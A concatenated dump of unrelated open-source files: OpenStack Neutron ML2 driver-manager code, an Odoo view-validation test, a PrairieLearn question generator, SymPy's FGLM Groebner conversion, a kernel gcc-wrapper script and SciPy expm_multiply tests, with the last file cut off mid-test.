:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_network_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("update_network_precommit", context)
def update_network_postcommit(self, context):
"""Notify all mechanism drivers after network update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_network_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure.
"""
self._call_on_drivers("update_network_postcommit", context,
continue_on_failure=True)
def delete_network_precommit(self, context):
"""Notify all mechanism drivers during network deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_network_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("delete_network_precommit", context)
def delete_network_postcommit(self, context):
"""Notify all mechanism drivers after network deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_network_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure. In
general we expect the caller to ignore the error, as the
network resource has already been deleted from the database
and it doesn't make sense to undo the action by recreating the
network.
"""
self._call_on_drivers("delete_network_postcommit", context,
continue_on_failure=True)
def create_subnet_precommit(self, context):
"""Notify all mechanism drivers during subnet creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_subnet_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("create_subnet_precommit", context)
def create_subnet_postcommit(self, context):
"""Notify all mechanism drivers after subnet creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_subnet_postcommit call fails.
Called after the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propagated
to the caller, where the subnet will be deleted, triggering
any required cleanup. There is no guarantee that all mechanism
drivers are called in this case.
"""
self._call_on_drivers("create_subnet_postcommit", context)
def update_subnet_precommit(self, context):
"""Notify all mechanism drivers during subnet update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_subnet_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("update_subnet_precommit", context)
def update_subnet_postcommit(self, context):
"""Notify all mechanism drivers after subnet update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_subnet_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure.
"""
self._call_on_drivers("update_subnet_postcommit", context,
continue_on_failure=True)
def delete_subnet_precommit(self, context):
"""Notify all mechanism drivers during subnet deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_subnet_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("delete_subnet_precommit", context)
def delete_subnet_postcommit(self, context):
"""Notify all mechanism drivers after subnet deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_subnet_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure. In
general we expect the caller to ignore the error, as the
subnet resource has already been deleted from the database
and it doesn't make sense to undo the action by recreating the
subnet.
"""
self._call_on_drivers("delete_subnet_postcommit", context,
continue_on_failure=True)
def create_port_precommit(self, context):
"""Notify all mechanism drivers during port creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_port_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("create_port_precommit", context)
def create_port_postcommit(self, context):
"""Notify all mechanism drivers of port creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_port_postcommit call fails.
Called after the database transaction. Errors raised by
mechanism drivers are left to propagate to the caller, where
the port will be deleted, triggering any required
cleanup. There is no guarantee that all mechanism drivers are
called in this case.
"""
self._call_on_drivers("create_port_postcommit", context)
def update_port_precommit(self, context):
"""Notify all mechanism drivers during port update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_port_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("update_port_precommit", context)
def update_port_postcommit(self, context):
"""Notify all mechanism drivers after port update.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver update_port_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure.
"""
self._call_on_drivers("update_port_postcommit", context,
continue_on_failure=True)
def delete_port_precommit(self, context):
"""Notify all mechanism drivers during port deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_port_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._call_on_drivers("delete_port_precommit", context)
def delete_port_postcommit(self, context):
"""Notify all mechanism drivers after port deletion.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver delete_port_postcommit call fails.
Called after the database transaction. If any mechanism driver
raises an error, then the error is logged but we continue to
call every other mechanism driver. A MechanismDriverError is
then reraised at the end to notify the caller of a failure. In
general we expect the caller to ignore the error, as the
port resource has already been deleted from the database
and it doesn't make sense to undo the action by recreating the
port.
"""
self._call_on_drivers("delete_port_postcommit", context,
continue_on_failure=True)
def bind_port(self, context):
"""Attempt to bind a port using registered mechanism drivers.
:param context: PortContext instance describing the port
Called outside any transaction to attempt to establish a port
binding.
"""
binding = context._binding
LOG.debug("Attempting to bind port %(port)s on host %(host)s "
"for vnic_type %(vnic_type)s with profile %(profile)s",
{'port': context.current['id'],
'host': context.host,
'vnic_type': binding.vnic_type,
'profile': binding.profile})
context._clear_binding_levels()
if not self._bind_port_level(context, 0,
context.network.network_segments):
binding.vif_type = portbindings.VIF_TYPE_BINDING_FAILED
LOG.error(_LE("Failed to bind port %(port)s on host %(host)s"),
{'port': context.current['id'],
'host': context.host})
def _bind_port_level(self, context, level, segments_to_bind):
binding = context._binding
port_id = context._port['id']
LOG.debug("Attempting to bind port %(port)s on host %(host)s "
"at level %(level)s using segments %(segments)s",
{'port': port_id,
'host': context.host,
'level': level,
'segments': segments_to_bind})
if level == MAX_BINDING_LEVELS:
LOG.error(_LE("Exceeded maximum binding levels attempting to bind "
"port %(port)s on host %(host)s"),
{'port': context.current['id'],
'host': context.host})
return False
for driver in self.ordered_mech_drivers:
if not self._check_driver_to_bind(driver, segments_to_bind,
context._binding_levels):
continue
try:
context._prepare_to_bind(segments_to_bind)
driver.obj.bind_port(context)
segment = context._new_bound_segment
if segment:
context._push_binding_level(
models.PortBindingLevel(port_id=port_id,
host=context.host,
level=level,
driver=driver.name,
segment_id=segment))
next_segments = context._next_segments_to_bind
if next_segments:
# Continue binding another level.
if self._bind_port_level(context, level + 1,
next_segments):
return True
else:
context._pop_binding_level()
else:
# Binding complete.
LOG.debug("Bound port: %(port)s, "
"host: %(host)s, "
"vif_type: %(vif_type)s, "
"vif_details: %(vif_details)s, "
"binding_levels: %(binding_levels)s",
{'port': port_id,
'host': context.host,
'vif_type': binding.vif_type,
'vif_details': binding.vif_details,
'binding_levels': context.binding_levels})
return True
except Exception:
LOG.exception(_LE("Mechanism driver %s failed in "
"bind_port"),
driver.name)
binding.vif_type = portbindings.VIF_TYPE_BINDING_FAILED
LOG.error(_LE("Failed to bind port %(port)s on host %(host)s"),
{'port': context._port['id'],
'host': binding.host})
def _check_driver_to_bind(self, driver, segments_to_bind, binding_levels):
# To prevent a possible binding loop, don't try to bind with
# this driver if the same driver has already bound at a higher
# level to one of the segments we are currently trying to
# bind. Note that is is OK for the same driver to bind at
# multiple levels using different segments.
for level in binding_levels:
if (level.driver == driver and
level.segment_id in segments_to_bind):
return False
return True
class ExtensionManager(stevedore.named.NamedExtensionManager):
"""Manage extension drivers using drivers."""
def __init__(self):
# Ordered list of extension drivers, defining
# the order in which the drivers are called.
self.ordered_ext_drivers = []
LOG.info(_LI("Configured extension driver names: %s"),
cfg.CONF.ml2.extension_drivers)
super(ExtensionManager, self).__init__('neutron.ml2.extension_drivers',
cfg.CONF.ml2.extension_drivers,
invoke_on_load=True,
name_order=True)
LOG.info(_LI("Loaded extension driver names: %s"), self.names())
self._register_drivers()
def _register_drivers(self):
"""Register all extension drivers.
This method should only be called once in the ExtensionManager
constructor.
"""
for ext in self:
self.ordered_ext_drivers.append(ext)
LOG.info(_LI("Registered extension drivers: %s"),
[driver.name for driver in self.ordered_ext_drivers])
def initialize(self):
# Initialize each driver in the list.
for driver in self.ordered_ext_drivers:
LOG.info(_LI("Initializing extension driver '%s'"), driver.name)
driver.obj.initialize()
def extension_aliases(self):
exts = []
for driver in self.ordered_ext_drivers:
alias = driver.obj.extension_alias
exts.append(alias)
LOG.info(_LI("Got %(alias)s extension from driver '%(drv)s'"),
{'alias': alias, 'drv': driver.name})
return exts
def _call_on_ext_drivers(self, method_name, plugin_context, data, result):
"""Helper method for calling a method across all extension drivers."""
for driver in self.ordered_ext_drivers:
try:
getattr(driver.obj, method_name)(plugin_context, data, result)
except Exception:
LOG.exception(
_LE("Extension driver '%(name)s' failed in %(method)s"),
{'name': driver.name, 'method': method_name}
)
def process_create_network(self, plugin_context, data, result):
"""Notify all extension drivers during network creation."""
self._call_on_ext_drivers("process_create_network", plugin_context,
data, result)
def process_update_network(self, plugin_context, data, result):
"""Notify all extension drivers during network update."""
self._call_on_ext_drivers("process_update_network", plugin_context,
data, result)
def process_create_subnet(self, plugin_context, data, result):
"""Notify all extension drivers during subnet creation."""
self._call_on_ext_drivers("process_create_subnet", plugin_context,
data, result)
def process_update_subnet(self, plugin_context, data, result):
"""Notify all extension drivers during subnet update."""
self._call_on_ext_drivers("process_update_subnet", plugin_context,
data, result)
def process_create_port(self, plugin_context, data, result):
"""Notify all extension drivers during port creation."""
self._call_on_ext_drivers("process_create_port", plugin_context,
data, result)
def process_update_port(self, plugin_context, data, result):
"""Notify all extension drivers during port update."""
self._call_on_ext_drivers("process_update_port", plugin_context,
data, result)
def extend_network_dict(self, session, base_model, result):
"""Notify all extension drivers to extend network dictionary."""
for driver in self.ordered_ext_drivers:
driver.obj.extend_network_dict(session, base_model, result)
LOG.debug("Extended network dict for driver '%(drv)s'",
{'drv': driver.name})
def extend_subnet_dict(self, session, base_model, result):
"""Notify all extension drivers to extend subnet dictionary."""
for driver in self.ordered_ext_drivers:
driver.obj.extend_subnet_dict(session, base_model, result)
LOG.debug("Extended subnet dict for driver '%(drv)s'",
{'drv': driver.name})
def extend_port_dict(self, session, base_model, result):
"""Notify all extension drivers to extend port dictionary."""
for driver in self.ordered_ext_drivers:
driver.obj.extend_port_dict(session, base_model, result)
LOG.debug("Extended port dict for driver '%(drv)s'",
{'drv': driver.name})
| apache-2.0 |
goliveirab/odoo | openerp/addons/base/tests/test_view_validation.py | 396 | 3427 | # This test can be run stand-alone with something like:
# > PYTHONPATH=. python2 openerp/tests/test_view_validation.py
from lxml import etree
from StringIO import StringIO
import unittest2
from openerp.tools.view_validation import (valid_page_in_book, valid_att_in_form, valid_type_in_colspan,
valid_type_in_col, valid_att_in_field, valid_att_in_label,
valid_field_in_graph, valid_field_in_tree
)
invalid_form = etree.parse(StringIO('''\
<form>
<label></label>
<group>
<div>
<page></page>
<label colspan="True"></label>
<field></field>
</div>
</group>
<notebook>
<page>
<group col="Two">
<div>
<label></label>
<field colspan="Five"> </field>
</div>
</group>
</page>
</notebook>
</form>
''')).getroot()
valid_form = etree.parse(StringIO('''\
<form string="">
<field name=""></field>
<field name=""></field>
<notebook>
<page>
<field name=""></field>
<label string=""></label>
<field name=""></field>
</page>
<page>
<group colspan="5" col="2">
<label for=""></label>
<label string="" colspan="5"></label>
</group>
</page>
</notebook>
</form>
''')).getroot()
invalid_graph = etree.parse(StringIO('''\
<graph>
<label/>
<group>
<div>
<field></field>
<field></field>
</div>
</group>
</graph>
''')).getroot()
valid_graph = etree.parse(StringIO('''\
<graph string="">
<field name=""></field>
<field name=""></field>
</graph>
''')).getroot()
invalid_tree = etree.parse(StringIO('''\
<tree>
<group>
<div>
<field></field>
<field></field>
</div>
</group>
</tree>
''')).getroot()
valid_tree = etree.parse(StringIO('''\
<tree string="">
<field name=""></field>
<field name=""></field>
<button/>
<field name=""></field>
</tree>
''')).getroot()
class test_view_validation(unittest2.TestCase):
""" Test the view validation code (but not the views themselves). """
def test_page_validation(self):
assert not valid_page_in_book(invalid_form)
assert valid_page_in_book(valid_form)
def test_all_field_validation(self):
assert not valid_att_in_field(invalid_form)
assert valid_att_in_field(valid_form)
def test_all_label_validation(self):
assert not valid_att_in_label(invalid_form)
assert valid_att_in_label(valid_form)
def test_form_string_validation(self):
assert valid_att_in_form(valid_form)
def test_graph_validation(self):
assert not valid_field_in_graph(invalid_graph)
assert valid_field_in_graph(valid_graph)
def test_tree_validation(self):
assert not valid_field_in_tree(invalid_tree)
assert valid_field_in_tree(valid_tree)
def test_colspan_datatype_validation(self):
assert not valid_type_in_colspan(invalid_form)
assert valid_type_in_colspan(valid_form)
def test_col_datatype_validation(self):
assert not valid_type_in_col(invalid_form)
assert valid_type_in_col(valid_form)
if __name__ == '__main__':
unittest2.main()
| agpl-3.0 |
mwest1066/PrairieLearn | exampleCourse/questions/demoDrawingInclinedPlane/server.py | 3 | 2014 | import random
import math
import numpy as np
def generate(data):
height_canvas = 400
data["params"]["height_canvas"] = height_canvas
a = random.choice([80,100,120])
b = random.choice([140,150,160])
c = random.choice([180,190,200,210])
data["params"]["a"] = a
data["params"]["b"] = b
data["params"]["c"] = c
x1 = 80
y1 = height_canvas - 80
x2 = x1 + a
y2 = y1 - c
x3 = x2 + b
y3 = y2
x0 = x2
y0 = y1
data["params"]["x0"] = x0
data["params"]["y0"] = y0
data["params"]["x1"] = x1
data["params"]["y1"] = y1
data["params"]["x2"] = x2
data["params"]["y2"] = y2
data["params"]["x3"] = x3
data["params"]["y3"] = y3
circle_radius = 40
data["params"]["circle_radius"] = circle_radius
angle = -random.choice([30,40,50])
theta_rad = angle*math.pi/180
data["params"]["theta"] = angle
data["params"]["normal_angle"] = angle - 90
rC = np.array([x3,y3])
e1 = np.array([math.cos(theta_rad), math.sin(theta_rad)])
e2 = np.array([-math.sin(theta_rad), math.cos(theta_rad)])
rD = rC + circle_radius*e2 - 100*e1
base_triangle = 120
rE = rD + np.array([ base_triangle,0])
height_triangle = base_triangle*math.tan(theta_rad)
rF = rE + np.array([0,height_triangle])
data["params"]["xD"] = rD[0]
data["params"]["yD"] = rD[1]
data["params"]["xE"] = rE[0]
data["params"]["yE"] = rE[1]
data["params"]["xF"] = rF[0]
data["params"]["yF"] = rF[1]
width_canvas = rE[0] + 80
data["params"]["width_canvas"] = width_canvas
data["params"]["xG"] = x1
data["params"]["yG"] = y2
data["params"]["xH"] = x3
data["params"]["yH"] = y1
width_arrow = 60
data["params"]["width_arrow"] = width_arrow
return data
| agpl-3.0 |
jaimahajan1997/sympy | sympy/polys/fglmtools.py | 21 | 4396 | """Implementation of matrix FGLM Groebner basis conversion algorithm. """
from __future__ import print_function, division
from sympy.polys.monomials import monomial_mul, monomial_div
from sympy.core.compatibility import range
def matrix_fglm(F, ring, O_to):
"""
Converts the reduced Groebner basis ``F`` of a zero-dimensional
ideal w.r.t. ``O_from`` to a reduced Groebner basis
w.r.t. ``O_to``.
References
==========
J.C. Faugere, P. Gianni, D. Lazard, T. Mora (1994). Efficient
Computation of Zero-dimensional Groebner Bases by Change of
Ordering
"""
domain = ring.domain
ngens = ring.ngens
ring_to = ring.clone(order=O_to)
old_basis = _basis(F, ring)
M = _representing_matrices(old_basis, F, ring)
# V contains the normalforms (wrt O_from) of S
S = [ring.zero_monom]
V = [[domain.one] + [domain.zero] * (len(old_basis) - 1)]
G = []
L = [(i, 0) for i in range(ngens)] # (i, j) corresponds to x_i * S[j]
L.sort(key=lambda k_l: O_to(_incr_k(S[k_l[1]], k_l[0])), reverse=True)
t = L.pop()
P = _identity_matrix(len(old_basis), domain)
while True:
s = len(S)
v = _matrix_mul(M[t[0]], V[t[1]])
_lambda = _matrix_mul(P, v)
if all(_lambda[i] == domain.zero for i in range(s, len(old_basis))):
# there is a linear combination of v by V
lt = ring.term_new(_incr_k(S[t[1]], t[0]), domain.one)
rest = ring.from_dict({S[i]: _lambda[i] for i in range(s)})
g = (lt - rest).set_ring(ring_to)
if g:
G.append(g)
else:
# v is linearly independant from V
P = _update(s, _lambda, P)
S.append(_incr_k(S[t[1]], t[0]))
V.append(v)
L.extend([(i, s) for i in range(ngens)])
L = list(set(L))
L.sort(key=lambda k_l: O_to(_incr_k(S[k_l[1]], k_l[0])), reverse=True)
L = [(k, l) for (k, l) in L if all(monomial_div(_incr_k(S[l], k), g.LM) is None for g in G)]
if not L:
G = [ g.monic() for g in G ]
return sorted(G, key=lambda g: O_to(g.LM), reverse=True)
t = L.pop()
def _incr_k(m, k):
return tuple(list(m[:k]) + [m[k] + 1] + list(m[k + 1:]))
def _identity_matrix(n, domain):
M = [[domain.zero]*n for _ in range(n)]
for i in range(n):
M[i][i] = domain.one
return M
def _matrix_mul(M, v):
return [sum([row[i] * v[i] for i in range(len(v))]) for row in M]
def _update(s, _lambda, P):
"""
Update ``P`` such that for the updated `P'` `P' v = e_{s}`.
"""
k = min([j for j in range(s, len(_lambda)) if _lambda[j] != 0])
for r in range(len(_lambda)):
if r != k:
P[r] = [P[r][j] - (P[k][j] * _lambda[r]) / _lambda[k] for j in range(len(P[r]))]
P[k] = [P[k][j] / _lambda[k] for j in range(len(P[k]))]
P[k], P[s] = P[s], P[k]
return P
def _representing_matrices(basis, G, ring):
"""
Compute the matrices corresponding to the linear maps `m \mapsto
x_i m` for all variables `x_i`.
"""
domain = ring.domain
u = ring.ngens-1
def var(i):
return tuple([0] * i + [1] + [0] * (u - i))
def representing_matrix(m):
M = [[domain.zero] * len(basis) for _ in range(len(basis))]
for i, v in enumerate(basis):
r = ring.term_new(monomial_mul(m, v), domain.one).rem(G)
for monom, coeff in r.terms():
j = basis.index(monom)
M[j][i] = coeff
return M
return [representing_matrix(var(i)) for i in range(u + 1)]
def _basis(G, ring):
"""
Computes a list of monomials which are not divisible by the leading
monomials wrt to ``O`` of ``G``. These monomials are a basis of
`K[X_1, \ldots, X_n]/(G)`.
"""
order = ring.order
leading_monomials = [g.LM for g in G]
candidates = [ring.zero_monom]
basis = []
while candidates:
t = candidates.pop()
basis.append(t)
new_candidates = [_incr_k(t, k) for k in range(ring.ngens)
if all(monomial_div(_incr_k(t, k), lmg) is None
for lmg in leading_monomials)]
candidates.extend(new_candidates)
candidates.sort(key=lambda m: order(m), reverse=True)
basis = list(set(basis))
return sorted(basis, key=lambda m: order(m))
| bsd-3-clause |
chrisk44/android_kernel_lge_hammerhead | scripts/gcc-wrapper.py | 181 | 3495 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import errno
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"return_address.c:62",
"hci_conn.c:407",
"cpufreq_interactive.c:804",
"cpufreq_interactive.c:847",
"ene_ub6250.c:2118",
])
# Capture the name of the object file, can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
if m and m.group(2) not in allowed_warnings:
print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
if ofile:
try:
os.remove(ofile)
except OSError:
pass
sys.exit(1)
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
try:
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
except OSError as e:
result = e.errno
if result == errno.ENOENT:
print args[0] + ':',e.strerror
print 'Is your PATH set correctly?'
else:
print ' '.join(args), str(e)
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
| gpl-2.0 |
arokem/scipy | scipy/sparse/linalg/tests/test_expm_multiply.py | 1 | 9651 | """Test functions for the sparse.linalg._expm_multiply module
"""
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.testing import (assert_allclose, assert_, assert_equal,
suppress_warnings)
from scipy.sparse import SparseEfficiencyWarning
import scipy.linalg
from scipy.sparse.linalg._expm_multiply import (_theta, _compute_p_max,
_onenormest_matrix_power, expm_multiply, _expm_multiply_simple,
_expm_multiply_interval)
def less_than_or_close(a, b):
return np.allclose(a, b) or (a < b)
class TestExpmActionSimple(object):
"""
These tests do not consider the case of multiple time steps in one call.
"""
def test_theta_monotonicity(self):
pairs = sorted(_theta.items())
for (m_a, theta_a), (m_b, theta_b) in zip(pairs[:-1], pairs[1:]):
assert_(theta_a < theta_b)
def test_p_max_default(self):
m_max = 55
expected_p_max = 8
observed_p_max = _compute_p_max(m_max)
assert_equal(observed_p_max, expected_p_max)
def test_p_max_range(self):
for m_max in range(1, 55+1):
p_max = _compute_p_max(m_max)
assert_(p_max*(p_max - 1) <= m_max + 1)
p_too_big = p_max + 1
assert_(p_too_big*(p_too_big - 1) > m_max + 1)
def test_onenormest_matrix_power(self):
np.random.seed(1234)
n = 40
nsamples = 10
for i in range(nsamples):
A = scipy.linalg.inv(np.random.randn(n, n))
for p in range(4):
if not p:
M = np.identity(n)
else:
M = np.dot(M, A)
estimated = _onenormest_matrix_power(A, p)
exact = np.linalg.norm(M, 1)
assert_(less_than_or_close(estimated, exact))
assert_(less_than_or_close(exact, 3*estimated))
def test_expm_multiply(self):
np.random.seed(1234)
n = 40
k = 3
nsamples = 10
for i in range(nsamples):
A = scipy.linalg.inv(np.random.randn(n, n))
B = np.random.randn(n, k)
observed = expm_multiply(A, B)
expected = np.dot(scipy.linalg.expm(A), B)
assert_allclose(observed, expected)
def test_matrix_vector_multiply(self):
np.random.seed(1234)
n = 40
nsamples = 10
for i in range(nsamples):
A = scipy.linalg.inv(np.random.randn(n, n))
v = np.random.randn(n)
observed = expm_multiply(A, v)
expected = np.dot(scipy.linalg.expm(A), v)
assert_allclose(observed, expected)
def test_scaled_expm_multiply(self):
np.random.seed(1234)
n = 40
k = 3
nsamples = 10
for i in range(nsamples):
for t in (0.2, 1.0, 1.5):
with np.errstate(invalid='ignore'):
A = scipy.linalg.inv(np.random.randn(n, n))
B = np.random.randn(n, k)
observed = _expm_multiply_simple(A, B, t=t)
expected = np.dot(scipy.linalg.expm(t*A), B)
assert_allclose(observed, expected)
def test_scaled_expm_multiply_single_timepoint(self):
np.random.seed(1234)
t = 0.1
n = 5
k = 2
A = np.random.randn(n, n)
B = np.random.randn(n, k)
observed = _expm_multiply_simple(A, B, t=t)
expected = scipy.linalg.expm(t*A).dot(B)
assert_allclose(observed, expected)
def test_sparse_expm_multiply(self):
np.random.seed(1234)
n = 40
k = 3
nsamples = 10
for i in range(nsamples):
A = scipy.sparse.rand(n, n, density=0.05)
B = np.random.randn(n, k)
observed = expm_multiply(A, B)
with suppress_warnings() as sup:
sup.filter(SparseEfficiencyWarning,
"splu requires CSC matrix format")
sup.filter(SparseEfficiencyWarning,
"spsolve is more efficient when sparse b is in the CSC matrix format")
expected = scipy.linalg.expm(A).dot(B)
assert_allclose(observed, expected)
def test_complex(self):
A = np.array([
[1j, 1j],
[0, 1j]], dtype=complex)
B = np.array([1j, 1j])
observed = expm_multiply(A, B)
expected = np.array([
1j * np.exp(1j) + 1j * (1j*np.cos(1) - np.sin(1)),
1j * np.exp(1j)], dtype=complex)
assert_allclose(observed, expected)
class TestExpmActionInterval(object):
def test_sparse_expm_multiply_interval(self):
np.random.seed(1234)
start = 0.1
stop = 3.2
n = 40
k = 3
endpoint = True
for num in (14, 13, 2):
A = scipy.sparse.rand(n, n, density=0.05)
B = np.random.randn(n, k)
v = np.random.randn(n)
for target in (B, v):
X = expm_multiply(A, target,
start=start, stop=stop, num=num, endpoint=endpoint)
samples = np.linspace(start=start, stop=stop,
num=num, endpoint=endpoint)
with suppress_warnings() as sup:
sup.filter(SparseEfficiencyWarning,
"splu requires CSC matrix format")
sup.filter(SparseEfficiencyWarning,
"spsolve is more efficient when sparse b is in the CSC matrix format")
for solution, t in zip(X, samples):
assert_allclose(solution,
scipy.linalg.expm(t*A).dot(target))
def test_expm_multiply_interval_vector(self):
np.random.seed(1234)
start = 0.1
stop = 3.2
endpoint = True
for num in (14, 13, 2):
for n in (1, 2, 5, 20, 40):
A = scipy.linalg.inv(np.random.randn(n, n))
v = np.random.randn(n)
X = expm_multiply(A, v,
start=start, stop=stop, num=num, endpoint=endpoint)
samples = np.linspace(start=start, stop=stop,
num=num, endpoint=endpoint)
for solution, t in zip(X, samples):
assert_allclose(solution, scipy.linalg.expm(t*A).dot(v))
def test_expm_multiply_interval_matrix(self):
np.random.seed(1234)
start = 0.1
stop = 3.2
endpoint = True
for num in (14, 13, 2):
for n in (1, 2, 5, 20, 40):
for k in (1, 2):
A = scipy.linalg.inv(np.random.randn(n, n))
B = np.random.randn(n, k)
X = expm_multiply(A, B,
start=start, stop=stop, num=num, endpoint=endpoint)
samples = np.linspace(start=start, stop=stop,
num=num, endpoint=endpoint)
for solution, t in zip(X, samples):
assert_allclose(solution, scipy.linalg.expm(t*A).dot(B))
def test_sparse_expm_multiply_interval_dtypes(self):
# Test A & B int
A = scipy.sparse.diags(np.arange(5),format='csr', dtype=int)
B = np.ones(5, dtype=int)
Aexpm = scipy.sparse.diags(np.exp(np.arange(5)),format='csr')
assert_allclose(expm_multiply(A,B,0,1)[-1], Aexpm.dot(B))
# Test A complex, B int
A = scipy.sparse.diags(-1j*np.arange(5),format='csr', dtype=complex)
B = np.ones(5, dtype=int)
Aexpm = scipy.sparse.diags(np.exp(-1j*np.arange(5)),format='csr')
assert_allclose(expm_multiply(A,B,0,1)[-1], Aexpm.dot(B))
# Test A int, B complex
A = scipy.sparse.diags(np.arange(5),format='csr', dtype=int)
B = np.full(5, 1j, dtype=complex)
Aexpm = scipy.sparse.diags(np.exp(np.arange(5)),format='csr')
assert_allclose(expm_multiply(A,B,0,1)[-1], Aexpm.dot(B))
def test_expm_multiply_interval_status_0(self):
self._help_test_specific_expm_interval_status(0)
def test_expm_multiply_interval_status_1(self):
self._help_test_specific_expm_interval_status(1)
def test_expm_multiply_interval_status_2(self):
self._help_test_specific_expm_interval_status(2)
def _help_test_specific_expm_interval_status(self, target_status):
np.random.seed(1234)
start = 0.1
stop = 3.2
num = 13
endpoint = True
n = 5
k = 2
nrepeats = 10
nsuccesses = 0
for num in [14, 13, 2] * nrepeats:
A = np.random.randn(n, n)
B = np.random.randn(n, k)
status = _expm_multiply_interval(A, B,
start=start, stop=stop, num=num, endpoint=endpoint,
status_only=True)
if status == target_status:
X, status = _expm_multiply_interval(A, B,
start=start, stop=stop, num=num, endpoint=endpoint,
status_only=False)
assert_equal(X.shape, (num, n, k))
samples = np.linspace(start=start, stop=stop,
